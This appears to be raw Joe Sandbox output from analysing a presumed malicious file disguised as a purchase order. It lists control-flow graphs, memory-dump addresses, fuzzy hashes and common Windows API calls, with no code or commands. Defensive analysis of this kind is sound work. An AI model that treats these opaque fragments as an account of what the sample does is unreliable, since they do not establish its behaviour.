                                                execution_graph 40571 36630040 40572 36630082 40571->40572 40574 36630089 40571->40574 40573 366300da CallWindowProcW 40572->40573 40572->40574 40573->40574 40575 36253210 40576 36253256 GetCurrentProcess 40575->40576 40578 362532a1 40576->40578 40579 362532a8 GetCurrentThread 40576->40579 40578->40579 40580 362532e5 GetCurrentProcess 40579->40580 40581 362532de 40579->40581 40582 3625331b 40580->40582 40581->40580 40583 36253343 GetCurrentThreadId 40582->40583 40584 36253374 40583->40584 40585 3625d7f0 40586 3625d858 CreateWindowExW 40585->40586 40588 3625d914 40586->40588 40588->40588 40589 366321f8 40590 36632500 40589->40590 40591 36632220 40589->40591 40592 36632229 40591->40592 40597 36631764 40591->40597 40594 36632543 40595 3663224c 40595->40594 40601 36631780 40595->40601 40598 3663176f 40597->40598 40599 36632543 40598->40599 40600 36631780 OleInitialize 40598->40600 40599->40595 40600->40599 40602 36632578 OleInitialize 40601->40602 40603 366325dc 40602->40603 40603->40594 40604 36253458 DuplicateHandle 40605 362534ee 40604->40605

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 527 36263158-36263179 528 3626317b-3626317e 527->528 529 36263184-362631a3 528->529 530 3626391f-36263922 528->530 540 362631a5-362631a8 529->540 541 362631bc-362631c6 529->541 531 36263924-36263943 530->531 532 36263948-3626394a 530->532 531->532 533 36263951-36263954 532->533 534 3626394c 532->534 533->528 537 3626395a-36263963 533->537 534->533 540->541 542 362631aa-362631ba 540->542 545 362631cc-362631db 541->545 542->545 653 362631dd call 36263970 545->653 654 362631dd call 36263978 545->654 546 362631e2-362631e7 547 362631f4-362634d1 546->547 548 362631e9-362631ef 546->548 569 362634d7-36263586 547->569 570 36263911-3626391e 547->570 548->537 579 362635af 569->579 580 36263588-362635ad 569->580 582 362635b8-362635cb 579->582 580->582 584 362635d1-362635f3 582->584 585 362638f8-36263904 582->585 584->585 588 362635f9-36263603 584->588 585->569 586 3626390a 585->586 586->570 588->585 589 36263609-36263614 588->589 589->585 590 3626361a-362636f0 589->590 602 362636f2-362636f4 590->602 603 362636fe-3626372e 590->603 602->603 607 36263730-36263732 603->607 608 3626373c-36263748 603->608 607->608 609 3626374a-3626374e 608->609 610 362637a8-362637ac 608->610 609->610 613 36263750-3626377a 609->613 611 362637b2-362637ee 610->611 612 362638e9-362638f2 610->612 624 362637f0-362637f2 611->624 625 362637fc-3626380a 611->625 612->585 612->590 620 3626377c-3626377e 613->620 621 36263788-362637a5 613->621 620->621 621->610 624->625 627 36263821-3626382c 625->627 628 3626380c-36263817 625->628 632 36263844-36263855 627->632 633 3626382e-36263834 627->633 628->627 631 36263819 628->631 631->627 637 36263857-3626385d 632->637 638 3626386d-36263879 632->638 634 36263836 633->634 635 36263838-3626383a 633->635 634->632 635->632 639 36263861-36263863 637->639 640 3626385f 637->640 642 36263891-362638e2 638->642 643 3626387b-36263881 638->643 639->638 640->638 642->612 644 36263885-36263887 643->644 645 36263883 643->645 644->642 645->642 653->546 654->546
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2986869713.0000000036260000.00000040.00000800.00020000.00000000.sdmp, Offset: 36260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36260000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $^q$$^q$$^q$$^q$$^q$$^q$605
                                                • API String ID: 0-129143561
                                                • Opcode ID: 65b34b013b4512869eae956205cced0c90baa289a1679f4dd736b359cfe4232b
                                                • Instruction ID: 8cec282b4bce9aedfea3d473a3ff2ae6eafb3ff1277acca9f28c897fc8ebb03c
                                                • Opcode Fuzzy Hash: 65b34b013b4512869eae956205cced0c90baa289a1679f4dd736b359cfe4232b
                                                • Instruction Fuzzy Hash: 16326F30E1071A8FDB14DF79C89499DB7B2FFC9304F6196A9D409AB224EF709985CB81
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2986869713.0000000036260000.00000040.00000800.00020000.00000000.sdmp, Offset: 36260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36260000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 405$405
                                                • API String ID: 0-2634294432
                                                • Opcode ID: 4553a2ac15925d141a2f78193bec6e7498775183f5bc9a36dfab970be7e02db9
                                                • Instruction ID: 68402fd8626e23ac83e964797178f5d25e471d2a5de56d50f0a1c464d0cba4ad
                                                • Opcode Fuzzy Hash: 4553a2ac15925d141a2f78193bec6e7498775183f5bc9a36dfab970be7e02db9
                                                • Instruction Fuzzy Hash: EA924738A012058FEB14CB69C584B4DB7F2FB44358F5684A9D809EB361DBB9EC86CF45

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1556 15e360-15e382 1557 15e384-15e3ba 1556->1557 1558 15e3e6-15e3ed 1556->1558 1564 15e3c1-15e3c3 1557->1564 1565 15e3c5-15e3de 1564->1565 1566 15e3ee-15e455 1564->1566 1565->1558 1576 15e457-15e459 1566->1576 1577 15e45e-15e46e 1566->1577 1578 15e6fd-15e704 1576->1578 1579 15e475-15e485 1577->1579 1580 15e470 1577->1580 1582 15e6e4-15e6f2 1579->1582 1583 15e48b-15e499 1579->1583 1580->1578 1586 15e705-15e77e 1582->1586 1587 15e6f4-15e6f8 call 157ad8 1582->1587 1583->1586 1588 15e49f 1583->1588 1587->1578 1588->1586 1589 15e6b4-15e6d6 1588->1589 1590 15e697-15e6b2 call 150350 1588->1590 1591 15e556-15e577 1588->1591 1592 15e530-15e551 1588->1592 1593 15e4bd-15e4de 1588->1593 1594 15e57c-15e59d 1588->1594 1595 15e5fc-15e639 1588->1595 1596 15e63e-15e664 1588->1596 1597 15e6d8-15e6e2 1588->1597 1598 15e4a6-15e4b8 1588->1598 1599 15e4e3-15e505 1588->1599 1600 15e5a2-15e5ca 1588->1600 1601 15e5cf-15e5f7 1588->1601 1602 15e669-15e695 1588->1602 1603 15e50a-15e52b 1588->1603 1589->1578 1590->1578 1591->1578 1592->1578 1593->1578 1594->1578 1595->1578 1596->1578 1597->1578 1598->1578 1599->1578 1600->1578 1601->1578 1602->1578 1603->1578
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2964395469.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_150000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Xbq$$^q
                                                • API String ID: 0-1593437937
                                                • Opcode ID: be6d83ed12040019674ae1fe1e8a216d60079c4895a1fb7b5a49b46d0539c5f9
                                                • Instruction ID: b969ce853123f9dcd16c3ff0fb9bcd3cfe1e2eb7b58abe27b9cdc89c84528143
                                                • Opcode Fuzzy Hash: be6d83ed12040019674ae1fe1e8a216d60079c4895a1fb7b5a49b46d0539c5f9
                                                • Instruction Fuzzy Hash: 4EB1E470B00254CBDB1CAB79885427E7BF3BFC8301B15852ED456EB398CE349D068B91
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2964395469.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_150000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3d481c5b7568f98962ad60e9232cd5a835479cdc24173af359466ec4ad39889d
                                                • Instruction ID: 1f1a459ab6ed106bbb34fc9faff35f992fd92ed0f4abe0f7d71b9c7485bdd38f
                                                • Opcode Fuzzy Hash: 3d481c5b7568f98962ad60e9232cd5a835479cdc24173af359466ec4ad39889d
                                                • Instruction Fuzzy Hash: EA53E731D10B1A8ADB11EF68C890699F7B1FF99300F51D79AE4597B121EB70AAC4CF81
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2986869713.0000000036260000.00000040.00000800.00020000.00000000.sdmp, Offset: 36260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36260000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 405
                                                • API String ID: 0-2177416938
                                                • Opcode ID: 126de568b8af5f36d8b4920d19442afae35676ca624d62719e6f46fe440cb41b
                                                • Instruction ID: aebe429859f8a44fe47e0d6ef83c0e039a75774c8dbe03a2be6b7f6e2d4d16c6
                                                • Opcode Fuzzy Hash: 126de568b8af5f36d8b4920d19442afae35676ca624d62719e6f46fe440cb41b
                                                • Instruction Fuzzy Hash: 0B62D234B002058FEB04DB6AD594B9DB7F2EF84348F218569E805EB351DB75EC96CB81
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2964395469.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_150000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: \Vdm
                                                • API String ID: 0-4198272578
                                                • Opcode ID: 59265af1bd180a9eda62abd67bdbb76cb641676ec640927f30d521ebd5fba83e
                                                • Instruction ID: 855b091a9be4c43b98137d375911ff04d9dd1f0fa61182b8ed671176e97b51e2
                                                • Opcode Fuzzy Hash: 59265af1bd180a9eda62abd67bdbb76cb641676ec640927f30d521ebd5fba83e
                                                • Instruction Fuzzy Hash: 92917270E00209CFDF14CFA8C9957DDBBF2AF48355F148529E824EB294EB749989CB81
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2986869713.0000000036260000.00000040.00000800.00020000.00000000.sdmp, Offset: 36260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36260000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 37bbf7fc9246914cf2bc83e4b1998b88f5279c0ef063742fab707804c026ad84
                                                • Instruction ID: 61e867501a5ef92b98108796bae7ef0f91eccd761036a28a636d32d24cf89c94
                                                • Opcode Fuzzy Hash: 37bbf7fc9246914cf2bc83e4b1998b88f5279c0ef063742fab707804c026ad84
                                                • Instruction Fuzzy Hash: E632E634B002059FDB04EB69D984B9EBBB2FB89344F218429D805FB351DB71EC86CB95
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2986869713.0000000036260000.00000040.00000800.00020000.00000000.sdmp, Offset: 36260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36260000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5640eac57844c92c4a875e5608406a274736bff1cb0a2beb65d6168a25a2b158
                                                • Instruction ID: ac6f91f534e407f5b2735642df4e1ca00588f2e0b191a58907483be7350f79b2
                                                • Opcode Fuzzy Hash: 5640eac57844c92c4a875e5608406a274736bff1cb0a2beb65d6168a25a2b158
                                                • Instruction Fuzzy Hash: F5121935F102069FEB10DF66C88465EB7B2EF85358F218429D84AEB385DB74DC86CB91
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2986869713.0000000036260000.00000040.00000800.00020000.00000000.sdmp, Offset: 36260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36260000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a6ed1a755437c51d01777b74da2be9e3d1efe022796113dba519892177168bb0
                                                • Instruction ID: 25303c01ca15dfcd3c4166cd743f973a25ebbf56873f424899b7302883f776b4
                                                • Opcode Fuzzy Hash: a6ed1a755437c51d01777b74da2be9e3d1efe022796113dba519892177168bb0
                                                • Instruction Fuzzy Hash: 3B229434F1020A8FEB10CB6AC49079DB7B6EB85359F218925F805EB391CA75DCD1CB51
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2964395469.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_150000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 66906c554d9a4f316bafdb1bc3e9b9289423e29205b5123b6b3574180acd7197
                                                • Instruction ID: f21a6155cb1d03bd2916443d4717256e6b7f99c3ddb1ed2238ad003f27cfd392
                                                • Opcode Fuzzy Hash: 66906c554d9a4f316bafdb1bc3e9b9289423e29205b5123b6b3574180acd7197
                                                • Instruction Fuzzy Hash: C9D1A334B00205CFCB14DBA8C594AADBBB2FF89311F54856AE816EB3A1DB31DD46CB51
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2964395469.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_150000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 00e900fa900c6b5d2837e7d3c6862196fb3c88d3f87dc4c834579c531d7f38f8
                                                • Instruction ID: a5032de0d8f7d689a83926bd6e25f7470b433580f1e12d64580ceeab8dd43d1e
                                                • Opcode Fuzzy Hash: 00e900fa900c6b5d2837e7d3c6862196fb3c88d3f87dc4c834579c531d7f38f8
                                                • Instruction Fuzzy Hash: 96D1BF31A40205CFDB14CF68D8847AEBBB1EF88311F54866AE919EF391D731DC498B92
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2964395469.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_150000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b4e57201c92c2e98cb9d81cff8bacbd6a354eb12d2cda77e5ca1c60bdd8b2e17
                                                • Instruction ID: 45b823d5ceccf9223dc9fe03584977aa0965777821e9dad3cc715c8ceb110b3e
                                                • Opcode Fuzzy Hash: b4e57201c92c2e98cb9d81cff8bacbd6a354eb12d2cda77e5ca1c60bdd8b2e17
                                                • Instruction Fuzzy Hash: DCB14470E00209CFDF14CFA9D9957DDBBF2AF88319F148129D865EB254EB749889CB81

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 655 36264c68-36264c8c 656 36264c8e-36264c91 655->656 657 36264cb2-36264cb5 656->657 658 36264c93-36264cad 656->658 659 36265394-36265396 657->659 660 36264cbb-36264db3 657->660 658->657 662 3626539d-362653a0 659->662 663 36265398 659->663 678 36264e36-36264e3d 660->678 679 36264db9-36264e06 call 36265511 660->679 662->656 664 362653a6-362653b3 662->664 663->662 680 36264e43-36264eb3 678->680 681 36264ec1-36264eca 678->681 692 36264e0c-36264e28 679->692 698 36264eb5 680->698 699 36264ebe 680->699 681->664 695 36264e33 692->695 696 36264e2a 692->696 695->678 696->695 698->699 699->681
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2986869713.0000000036260000.00000040.00000800.00020000.00000000.sdmp, Offset: 36260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36260000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: fcq$XPcq$\Ocq$x=05$x=05
                                                • API String ID: 0-2557378851
                                                • Opcode ID: ed3de603880dfb9688d6a7c5d33146c2f4328755af1bf93588f85a252031f7a7
                                                • Instruction ID: 20bc049edc8a134e3b3fcebb6d3daf46478475a8743fd4e5a2fee61915bdc498
                                                • Opcode Fuzzy Hash: ed3de603880dfb9688d6a7c5d33146c2f4328755af1bf93588f85a252031f7a7
                                                • Instruction Fuzzy Hash: 2161A330E002099FEB159FA9C8547AEBBF6FF88304F20852AD545AB391DF748D468F91

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 701 3625320a-3625329f GetCurrentProcess 705 362532a1-362532a7 701->705 706 362532a8-362532dc GetCurrentThread 701->706 705->706 707 362532e5-36253319 GetCurrentProcess 706->707 708 362532de-362532e4 706->708 709 36253322-3625333d call 362533e0 707->709 710 3625331b-36253321 707->710 708->707 714 36253343-36253372 GetCurrentThreadId 709->714 710->709 715 36253374-3625337a 714->715 716 3625337b-362533dd 714->716 715->716
                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 3625328E
                                                • GetCurrentThread.KERNEL32 ref: 362532CB
                                                • GetCurrentProcess.KERNEL32 ref: 36253308
                                                • GetCurrentThreadId.KERNEL32 ref: 36253361
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2986850815.0000000036250000.00000040.00000800.00020000.00000000.sdmp, Offset: 36250000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36250000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0
                                                • Opcode ID: 4db0d06e63d506c276bd36a0cec9dda190dacda3430849c47d96b2a02e672a54
                                                • Instruction ID: 04282bb4ddbe462224e447c1ca2601210b96c42584a9e01c9b1bf8a2ebdcffb0
                                                • Opcode Fuzzy Hash: 4db0d06e63d506c276bd36a0cec9dda190dacda3430849c47d96b2a02e672a54
                                                • Instruction Fuzzy Hash: 6A5168B09006498FDB14DFA9C948BDEFBF1EF49300F218469E619B7260DB349980CF65

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 723 36253210-3625329f GetCurrentProcess 727 362532a1-362532a7 723->727 728 362532a8-362532dc GetCurrentThread 723->728 727->728 729 362532e5-36253319 GetCurrentProcess 728->729 730 362532de-362532e4 728->730 731 36253322-3625333d call 362533e0 729->731 732 3625331b-36253321 729->732 730->729 736 36253343-36253372 GetCurrentThreadId 731->736 732->731 737 36253374-3625337a 736->737 738 3625337b-362533dd 736->738 737->738
                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 3625328E
                                                • GetCurrentThread.KERNEL32 ref: 362532CB
                                                • GetCurrentProcess.KERNEL32 ref: 36253308
                                                • GetCurrentThreadId.KERNEL32 ref: 36253361
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2986850815.0000000036250000.00000040.00000800.00020000.00000000.sdmp, Offset: 36250000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36250000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0
                                                • Opcode ID: f07aca0c8588e9caf46f64671ba31540eec501d4f036d8ba31574180a643932b
                                                • Instruction ID: ed42ccb2086b6d7f8d87e766f1e423b4b1285227245a211b88debb0ada6f34ec
                                                • Opcode Fuzzy Hash: f07aca0c8588e9caf46f64671ba31540eec501d4f036d8ba31574180a643932b
                                                • Instruction Fuzzy Hash: DB5148B09006498FDB54DFAAC948BDEFBF1EF49310F218469E619A7360DB34A940CF65

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 842 36264c59-36264c8c 843 36264c8e-36264c91 842->843 844 36264cb2-36264cb5 843->844 845 36264c93-36264cad 843->845 846 36265394-36265396 844->846 847 36264cbb-36264db3 844->847 845->844 849 3626539d-362653a0 846->849 850 36265398 846->850 865 36264e36-36264e3d 847->865 866 36264db9-36264e06 call 36265511 847->866 849->843 851 362653a6-362653b3 849->851 850->849 867 36264e43-36264eb3 865->867 868 36264ec1-36264eca 865->868 879 36264e0c-36264e28 866->879 885 36264eb5 867->885 886 36264ebe 867->886 868->851 882 36264e33 879->882 883 36264e2a 879->883 882->865 883->882 885->886 886->868
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2986869713.0000000036260000.00000040.00000800.00020000.00000000.sdmp, Offset: 36260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36260000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: fcq$XPcq$x=05
                                                • API String ID: 0-1293912557
                                                • Opcode ID: f6fcb95db03dddc7ee96934b288f5be8629f830b9840f698af598140a6583425
                                                • Instruction ID: e94c0b33946623b08fe6afbf0a867a662e3f660e53adf157ad74e86388d29261
                                                • Opcode Fuzzy Hash: f6fcb95db03dddc7ee96934b288f5be8629f830b9840f698af598140a6583425
                                                • Instruction Fuzzy Hash: CE518130E102089FEB059FB9C454B9EBBF6BF88700F208529D545AB395DE708C418B51

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1336 1587b9-1587cf 1337 1587d1-1587d4 1336->1337 1338 1587d6-1587fc 1337->1338 1339 158801-158804 1337->1339 1338->1339 1340 158806-15881a 1339->1340 1341 15881f-158822 1339->1341 1340->1341 1342 158824-15884a 1341->1342 1343 15884f-158852 1341->1343 1342->1343 1345 158854-15887a 1343->1345 1346 15887f-158882 1343->1346 1345->1346 1348 158884-1588aa 1346->1348 1349 1588af-1588b2 1346->1349 1348->1349 1352 1588b4-1588da 1349->1352 1353 1588df-1588e2 1349->1353 1352->1353 1356 1588e4-15890a 1353->1356 1357 15890f-158912 1353->1357 1356->1357 1361 158914-15893a 1357->1361 1362 15893f-158942 1357->1362 1361->1362 1365 158944-15896a 1362->1365 1366 15896f-158972 1362->1366 1365->1366 1370 158974-15899a 1366->1370 1371 15899f-1589a2 1366->1371 1370->1371 1375 1589a4-1589ca 1371->1375 1376 1589cf-1589d2 1371->1376 1375->1376 1380 1589d4-1589fa 1376->1380 1381 1589ff-158a02 1376->1381 1380->1381 1385 158a04-158a2a 1381->1385 1386 158a2f-158a32 1381->1386 1385->1386 1390 158a34-158a5a 1386->1390 1391 158a5f-158a62 1386->1391 1390->1391 1395 158a64-158a8a 1391->1395 1396 158a8f-158a92 1391->1396 1395->1396 1400 158a94-158aba 1396->1400 1401 158abf-158ac2 1396->1401 1400->1401 1405 158ac4-158aea 1401->1405 1406 158aef-158af2 1401->1406 1405->1406 1410 158af4-158b1a 1406->1410 1411 158b1f-158b22 1406->1411 1410->1411 1415 158b24-158b4a 1411->1415 1416 158b4f-158b52 1411->1416 1415->1416 1420 158b54-158b7a 1416->1420 1421 158b7f-158b82 1416->1421 1420->1421 1425 158b84-158baa 1421->1425 1426 158baf-158bb2 1421->1426 1425->1426 1430 158bb4-158bda 1426->1430 1431 158bdf-158be2 1426->1431 1430->1431 1435 158be4-158c0a 1431->1435 1436 158c0f-158c12 1431->1436 1435->1436 1440 158c14-158c3a 1436->1440 1441 158c3f-158c42 1436->1441 1440->1441 1445 158c44-158c6a 1441->1445 1446 158c6f-158c72 1441->1446 1445->1446 1450 158c74-158c9a 1446->1450 1451 158c9f-158ca2 1446->1451 1450->1451 1455 158ca4-158cca 1451->1455 1456 158ccf-158cd2 1451->1456 1455->1456 1460 158cd4 1456->1460 1461 158cdf-158ce2 1456->1461 1553 158cd4 call 159f31 1460->1553 1554 158cd4 call 159038 1460->1554 1555 158cd4 call 159048 1460->1555 1468 158ce4-158d0a 1461->1468 1469 158d0f-158d12 1461->1469 1468->1469 1470 158d14-158d3a 1469->1470 1471 158d3f-158d42 1469->1471 1470->1471 1477 158d44-158d6a 1471->1477 1478 158d6f-158d72 1471->1478 1472 158cda 1472->1461 1477->1478 1480 158d74-158d9a 1478->1480 1481 158d9f-158da2 1478->1481 1480->1481 1486 158da4-158da6 1481->1486 1487 158db3-158db6 1481->1487 1550 158da8 call 15a010 1486->1550 1551 158da8 call 15a000 1486->1551 1552 158da8 call 15a0b3 1486->1552 1489 158de3-158de6 1487->1489 1490 158db8-158dde 1487->1490 1495 158e13-158e16 1489->1495 1496 158de8-158e0e 1489->1496 1490->1489 1498 158e43-158e46 1495->1498 1499 158e18-158e3e 1495->1499 1496->1495 1497 158dae 1497->1487 1504 158e63-158e66 1498->1504 1505 158e48-158e5e 1498->1505 1499->1498 1510 158e93-158e96 1504->1510 1511 158e68-158e8e 1504->1511 1505->1504 1512 158ec3-158ec6 1510->1512 1513 158e98-158ebe 1510->1513 1511->1510 1519 158ef3-158ef6 1512->1519 1520 158ec8-158eee 1512->1520 1513->1512 1521 158f23-158f26 1519->1521 1522 158ef8-158f1e 1519->1522 1520->1519 1529 158f53-158f56 1521->1529 1530 158f28-158f4e 1521->1530 1522->1521 1531 158f83-158f85 1529->1531 1532 158f58-158f7e 1529->1532 1530->1529 1538 158f87 1531->1538 1539 158f8c-158f8f 1531->1539 1532->1531 1538->1539 1539->1337 1540 158f95-158f9b 1539->1540 1550->1497 1551->1497 1552->1497 1553->1472 1554->1472 1555->1472
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2964395469.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_150000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: H05$05
                                                • API String ID: 0-3594489368
                                                • Opcode ID: deb454775833fbf68eb0cf0e8ebb59d3f5c3c4971983b408c9d07ac070cbf001
                                                • Instruction ID: e4d95e040e3fca5bdf37b37642171f84bebe0cb030ef54f79e1b5eb2d4e38daa
                                                • Opcode Fuzzy Hash: deb454775833fbf68eb0cf0e8ebb59d3f5c3c4971983b408c9d07ac070cbf001
                                                • Instruction Fuzzy Hash: 4C127E30B002059FCB15AB2CD95526CB7A3EBC5305B60893EE406EB365CF71ED8B9B91

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2164 36269200-36269203 2165 36269206-3626923a 2164->2165 2166 36269265-3626927e 2164->2166 2167 36269260-36269263 2165->2167 2168 3626923c-3626925b 2165->2168 2171 36269296-362692ac 2166->2171 2172 36269280-36269288 2166->2172 2167->2166 2168->2167 2176 362692b7-362692b9 2171->2176 2172->2171 2177 362692d1-36269342 2176->2177 2178 362692bb-362692c3 2176->2178 2188 36269344-36269367 2177->2188 2189 3626936e-3626938a 2177->2189 2178->2177 2188->2189 2194 362693b6-362693d1 2189->2194 2195 3626938c-362693af 2189->2195 2200 362693d3-362693f5 2194->2200 2201 362693fc-36269417 2194->2201 2195->2194 2200->2201 2206 36269442-36269b3f 2201->2206 2207 36269419-3626943b 2201->2207 2207->2206
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2986869713.0000000036260000.00000040.00000800.00020000.00000000.sdmp, Offset: 36260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36260000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $^q$$^q
                                                • API String ID: 0-355816377
                                                • Opcode ID: b65d8c7c6ed558a01c7631a9d7c882ac722b99c9df5ec9fbd8370938894cf599
                                                • Instruction ID: 45e9ae4e418b5e26594d14bfee67263d1d1a5ca95ce56e0f48ee4aedc582a90a
                                                • Opcode Fuzzy Hash: b65d8c7c6ed558a01c7631a9d7c882ac722b99c9df5ec9fbd8370938894cf599
                                                • Instruction Fuzzy Hash: FA515534B0020A9FDB44DB6AD8507AEB7F6EBC9344F108469C809E7344EF70DC428B95
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2986869713.0000000036260000.00000040.00000800.00020000.00000000.sdmp, Offset: 36260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36260000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 8X)3TX)3$$^q
                                                • API String ID: 0-1297511577
                                                • Opcode ID: 18c8a26ddb9d2e8164a2916eafb5a2837887db2269473788706178be83a6d8e8
                                                • Instruction ID: 87e6b3db7b38c3ada1d53bcc2e72063605cd17100c88f7531adf574b9f4d507c
                                                • Opcode Fuzzy Hash: 18c8a26ddb9d2e8164a2916eafb5a2837887db2269473788706178be83a6d8e8
                                                • Instruction Fuzzy Hash: 37F08C79A102168BEF148E4B9A846A977B9EB4035CF224026DC04AB241CBF9D996C7A5
                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 3625D902
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2986850815.0000000036250000.00000040.00000800.00020000.00000000.sdmp, Offset: 36250000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36250000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: d08625176b5868db9213081342cb53043904f115b375529d731a2d4d91b17388
                                                • Instruction ID: 7f0a71b3c49736e469da46e1396f13215890663897a51ff9095753197baf7b64
                                                • Opcode Fuzzy Hash: d08625176b5868db9213081342cb53043904f115b375529d731a2d4d91b17388
                                                • Instruction Fuzzy Hash: ED51D2B5D003499FDB14CFAAC884ADEFBB5BF48310F21852AE818AB210D775A841CF91
                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 3625D902
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2986850815.0000000036250000.00000040.00000800.00020000.00000000.sdmp, Offset: 36250000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36250000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
